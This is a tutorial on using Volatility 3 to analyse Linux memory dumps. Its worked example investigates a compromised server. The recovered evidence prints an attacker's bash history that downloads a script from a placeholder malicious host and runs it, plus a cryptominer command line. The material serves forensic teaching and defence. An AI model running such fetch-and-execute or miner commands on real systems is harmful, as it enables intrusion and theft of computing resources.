Volatility 3 — Linux Memory Dump Analysis Guide

Volatility 3 is a complete rewrite of the Volatility framework for RAM dump analysis (see the Volatility 2 article for background). The biggest change: no more profiles. Volatility 3 reads data structures directly from kernel Symbol Tables, eliminating the manual profile selection that was error-prone in v2.

What Changed Compared to Volatility 2?

Installation

Volatility 3 requires Python 3.7 or newer.

# Clone the repository
git clone https://github.com/volatilityfoundation/volatility3.git
cd volatility3

# Install dependencies
pip3 install -r requirements.txt

# Verify it works
python3 vol.py -h

Installing Symbol Tables

Volatility 3 needs Symbol Tables matching the kernel version from the analyzed dump. For Linux, you can generate them yourself using the dwarf2json tool, or download pre-built ones from the project’s website.

# Download pre-built symbol tables for Linux
# Place them in the volatility3/symbols/ directory
ls volatility3/symbols/linux/

If Volatility 3 can’t find the appropriate table automatically, it will display an error message specifying the exact kernel version it’s looking for.

New Syntax — Key Plugins

In Volatility 3, plugins are organized hierarchically by operating system. For Linux, they all start with linux.:

Listing Processes

# Volatility 2 (old syntax):
# volatility -f dump.raw --profile=Linux_X pslist

# Volatility 3:
vol -f dump.raw linux.pslist

Process Tree

vol -f dump.raw linux.pstree

Network Connections

vol -f dump.raw linux.sockstat

Loaded Kernel Modules

vol -f dump.raw linux.lsmod

Open Files

vol -f dump.raw linux.lsof

Bash Command History

vol -f dump.raw linux.bash

Mounted Filesystems

vol -f dump.raw linux.mountinfo

Process Environment Variables

vol -f dump.raw linux.envars

Practical Example: Analyzing a Compromised Server

Scenario: Your server is behaving suspiciously — CPU load is high with no visible cause. You managed to capture a memory dump using LiME:

# Capturing memory on a live system
sudo insmod lime-$(uname -r).ko "path=/tmp/dump.raw format=raw"

Now let’s analyze the dump:

1. Listing processes:

vol -f /tmp/dump.raw linux.pslist

PID     PPID    COMM
1       0       systemd
...
4821    4820    kworkerds
4825    4821    kworkerds

We see a suspicious process kworkerds — a name deceptively similar to the legitimate kernel thread kworker, but it’s a separate process with its own PID and PPID.

2. Checking launch arguments:

vol -f /tmp/dump.raw linux.cmdline --pid 4821

PID     ARGS
4821    /tmp/kworkerds -o stratum+tcp://pool.minero.cc:5555 -u wallet123

It’s a cryptocurrency miner communicating with a mining pool.

3. Checking network connections:

vol -f /tmp/dump.raw linux.sockstat

The kworkerds process is maintaining an active TCP connection on port 5555 to an external IP address.

4. Finding out how the attacker got in:

vol -f /tmp/dump.raw linux.bash

PID     COMM    COMMAND
1102    bash    wget http://malicious.site/payload.sh -O /tmp/payload.sh
1102    bash    chmod +x /tmp/payload.sh
1102    bash    /tmp/payload.sh

The bash history reveals that the attacker downloaded and executed a malicious script.

Useful Options

• Filtering by PID: Most plugins accept --pid to narrow results to a specific process:

  vol -f dump.raw linux.lsof --pid 4821
  

• Dumping a binary from memory: To extract a suspicious binary for further analysis:

  vol -f dump.raw linux.elfs --pid 4821 --dump
  

• Listing available plugins:

  vol -f dump.raw linux --help
  

Volatility 3 vs Live Tools

It’s worth remembering how memory dump analysis differs from tools running on a live system:

• ps, top, ss — can be fooled by rootkits that hide processes.
• Volatility 3 analyzes raw memory — a rootkit cannot hide from offline analysis.
• A memory dump is a “frozen” state — nothing changes during analysis, unlike on a live system.

Volatility 3’s automatic symbol resolution and hierarchical plugin system make it significantly easier to use than v2, especially for Linux analysis.